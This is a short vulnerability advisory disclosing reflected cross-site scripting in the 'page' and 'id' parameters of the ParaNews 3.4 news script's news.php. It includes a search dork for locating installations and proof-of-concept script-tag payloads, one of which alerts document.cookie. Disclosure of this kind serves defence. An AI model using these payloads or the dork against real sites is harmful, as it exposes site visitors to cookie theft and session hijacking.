# Author : Xylitol
# Contact : n/a
# Vendor : s0nic (www.monxoom.de)
# Version: 3.4
# D0rks : Powered by Paranews 3.4
# Public release vulnz: 10/09/08
# Impact: low
# Stop lammer


####################
1. Description:
####################
Auf den Namen »ParaNews« habe ich mein Newsscript getauft,
welches zur Pflege eines Newsbereich in einer Website gedacht ist.
Dabei können online über ein Admin Control Panel (ACP)
komfortabel News geschrieben, editiert und gelöscht werden.


####################
2. Vulnerable page:
####################
news.php
bad filtered value : "page" variable
bad filtered value : "id" variable

news.php?pn_go=details&page=[XSS]&id=[XSS]


####################
3. PoC:
####################


"><script>alert(document.cookie)</script>
"><marquee><h1>xyl</h1></marquee>
"><script>alert(1337)</script>

dont forget the ">


####################
4. Greetings:
####################
Uber0n, Langy, code91, FullFreeze, meloulisi, t0fx
xssing, sla.ckers and security-sh3ll ppl